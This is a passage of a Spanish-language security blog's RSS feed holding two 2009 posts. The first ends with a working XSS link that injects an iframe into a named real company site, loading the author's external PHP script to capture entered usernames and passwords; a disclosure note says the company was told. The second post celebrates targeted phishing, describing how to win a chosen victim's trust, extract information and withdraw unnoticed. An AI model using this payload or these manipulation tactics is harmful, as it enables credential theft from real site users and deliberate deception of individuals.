<input type=submit value=Ingresar/>
</form>

</body>
</html>
</pre>
<p>Incluimos nuestro script en el iframe:</p>
<p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;" target="_blank">http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;</a></p>
<p>Ingresamos nuestra información, usuario y contraseña, y vemos como el script php que hicimos se encarga de guardar la información y mostrarla, llenamos el formulario con datos de prueba como usuario=miusuario y password=mipassword, al presionar el botón &#8220;<em>ingresar</em>&#8220;, veremos la siguiente pantalla:</p>
<p><img class="aligncenter size-full wp-image-1337" title="xss2" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss2.png" alt="" width="306" height="229" /></p>
<p><img class="aligncenter size-full wp-image-1338" title="xss3" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss3.png" alt="" width="224" height="179" /></p>
<p>Perfectamente podemos <strong>engañar</strong> a los empleados o clientes de ésta empresa, para que ingresen a éste sitio y nos entreguen información <strong>confidencial</strong>. Con un poco de ingeniería social y tiempo.</p>
<p><strong>NOTA: La empresa encargada de éste sitio fue notificada de los fallos hace mucho tiempo (más de 2 meses)</strong></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>El arte del &#8216;phishing&#8217;</title>
		<link>http://blog.zerial.org/seguridad/el-arte-del-phishing/</link>
		<comments>http://blog.zerial.org/seguridad/el-arte-del-phishing/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 23:45:46 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Historias]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bancos]]></category>
		<category><![CDATA[fraudes]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[robos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1302</guid>
		<description><![CDATA[Sin duda el phishing es una de las técnicas más usadas actualmente para el robo de información y suplantación de identidad, pero debemos reconocer que es todo un arte. Para quienes no saben lo que es el phishing, les extraigo lo siguiente desde la wikipedia: ﻿Phishing es un término informático que denomina un tipo de [...]]]></description>
			<content:encoded><![CDATA[<p>Sin duda el <em>phishing</em> es una de las técnicas más usadas actualmente para el robo de información y suplantación de identidad, pero debemos reconocer que es todo un arte. Para quienes no saben lo que es el phishing, les extraigo lo siguiente desde la wikipedia:</p>
<blockquote><p>﻿<strong>Phishing</strong> es un término <a title="Informático" href="http://es.wikipedia.org/wiki/Inform%C3%A1tico">informático</a> que denomina un tipo de <a title="Delito" href="http://es.wikipedia.org/wiki/Delito">delito</a> encuadrado dentro del ámbito de las <a title="Estafa" href="http://es.wikipedia.org/wiki/Estafa">estafas</a> cibernéticas, y que se comete mediante el uso de un tipo de <a title="Ingeniería social (seguridad informática)" href="http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29">ingeniería social</a> caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una <a title="Contraseña" href="http://es.wikipedia.org/wiki/Contrase%C3%B1a">contraseña</a> o información detallada sobre <a title="Tarjeta de crédito" href="http://es.wikipedia.org/wiki/Tarjeta_de_cr%C3%A9dito">tarjetas de crédito</a> u otra información bancaria).</p></blockquote>
<p><a href="http://blog.zerial.org/wp-content/uploads/2009/12/phishing.jpg"><img class="alignleft size-full wp-image-1304" title="phishing" src="http://blog.zerial.org/wp-content/uploads/2009/12/phishing.jpg" alt="" width="265" height="270" /></a>Como dice la definición, son técnicas que se aplican mediante <strong>ingeniería social</strong> y ésta es, por si misma, un arte.<br />
Podemos detectar distintos tipos de phishing, desde uno muy simple como falsificar un sitio y lanzarlo al mundo para que la gente caiga o bien uno más complejo con objetivos determinados y con víctimas específicas. En el primer tipo, me gustaría hacer referencia a todos los conocidos ataques que se han hecho a bancos simplemente falsificando el sitio web y obteniendo información de gente al azar, por ejemplo el <a href="http://blog.segu-info.com.ar/2009/12/mas-phishing-para-mastercard.html" target="_blank">caso en que se vio envuelto Mastercard Argentina</a>. Con el segundo tipo, quiero hacer referencia a casos más trascendentes que generalmente no son conocidos, ya que no afectan a mucha gente sino mas bien a una víctima específica. Para mi, el primer tipo es una <strong>mierda</strong>, sin embargo, me gustaría destacar los ataques del segúndo tipo. De ahora en adelante, los distinguiré según su tipo.</p>
<p><span id="more-1302"></span></p>
<p>Primero, voy a entrar en detalles con el <em>phishing</em> de <strong>primer tipo.</strong> Cualquier persona con mínimos conocimientos en desarrollo puede copiar una página y conseguirse un dominio similar al original para hospedarla y lanzarla al mundo para ver quienes caen, generalmente con estos tipos de ataques no sabes quienes son las personas que caen en tu trampa, simplemente obtienes sus datos para fastidiarles, ingresas a sus cuentas y ver si tiene algo <em>entretenido</em>, no tiene ninguna ciencia. Este tipo de ataques no tienen ningún sentido, no se está aplicando ingeniería social ni mucho menos.<br />
Existe una <strong>gran</strong> diferencia entre dirigir los ataques a una persona o víctima en particular versus el direccionarlo a quien caiga: la dificultad y la emoción.</p>
<p>El <strong>segúndo tipo</strong> es en el que quiero profundizar más. Cuando tenemos una víctima en la mira, es mucho más emocionando hacer éste tipo de ataques, ya que nos costará más y nuestro fín es único, no afectará a otras personas quienes no nos interesa. Para hacer ataques dirigidos, tenemos distintas técnicas, desde ataques locales hasta ataques remotos, podemos hacernos pasar por otra persona, engañando a nuestra víctima para que crea lo que nosotros queremos que crea y así obtener lo que queremos, hasta podemos manipularla. La víctima debe pensar que somos alguien de confianza, que se mueve dentro de su círculo de amigos o conocidos, sabemos mucho de ella y ella <em>cree</em> saber mucho de nosotros. Hacer que la víctima confíe en nosotros toma mucho tiempo, hace que haga lo que nosotros queremos más aún. Se puede lograr desde ataques sicológicos hasta con ataques netamente <em>informáticos</em> pero sin duda lo mejor es una combinación de ambos. Generalmente las víctimas de éste tipo de ataque son conocidos (nosotros lo conocemos, pero muchas veces él a nosotros no) a menos que sea por <a href="http://blog.zerial.org/seguridad/algo-asi-como-un-asesino-a-sueldo/" target="_blank">encargo</a>.<br />
La captura de datos o información se puede lograr falsificando websites, por teléfono, en persona, mediante algun tipo de mensajería instantanea, <em>sniffeando</em> la red, etc. Todo va a depender de nuestra imaginación, conocimiento y capacidades.</p>
<p><img class="alignright size-medium wp-image-1315" title="target" src="http://blog.zerial.org/wp-content/uploads/2009/12/target_poker-240x300.jpg" alt="" width="142" height="178" />Cuando tenemos una víctima elegida, es muy entretenido el proceso en el cual hay que seducirla y mucho más aún, cuando la persona cae en nuestro juego y una véz obtenida la información es mucho más emocionante aún. Luego es el proceso de la verificación de información y posteriormente, una des-seducción de nuestra víctima, es decir, hacer que poco a poco se vaya alejando, pero sin perder el control de la situación y obviamente, sin pretender que nuestro objetivo se de cuenta de lo que planeamos hacer. Lo mejor es confundirlo.<br />
No siempre se logra el objetivo, aveces porque nuestras técnicas han fallado y otras veces porque la persona que elegimos como víctima no es tan fácil de seducir. Hay que saber en qué momento abortar misión, porque los afectados podemos ser nosotros.</p>
<p>Existe un concepto errado de lo que es el phishing, al igual que muchas cosas, la popularidad de los términos terminan deformandose. Para mucha gente éste término es sinónimo de &#8220;<em>robo de cuenta del banco y transferencias de dinero ilícitas</em>&#8220;, que sería la definición <strong>peyorativa</strong>.<br />
Detrás de muchos <strong>hackeos</strong> existen, implícita o explícitamente, técnicas de phishing aplicadas sobre las víctimas, y no podemos desperdiciar todo el <em>proceso pensante</em> y las capacidades del atacante para elaborar un ataque de ésta magnitud.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;linkname=El%20arte%20del%20%26%238216%3Bphishing%26%238217%3B">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-arte-del-phishing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
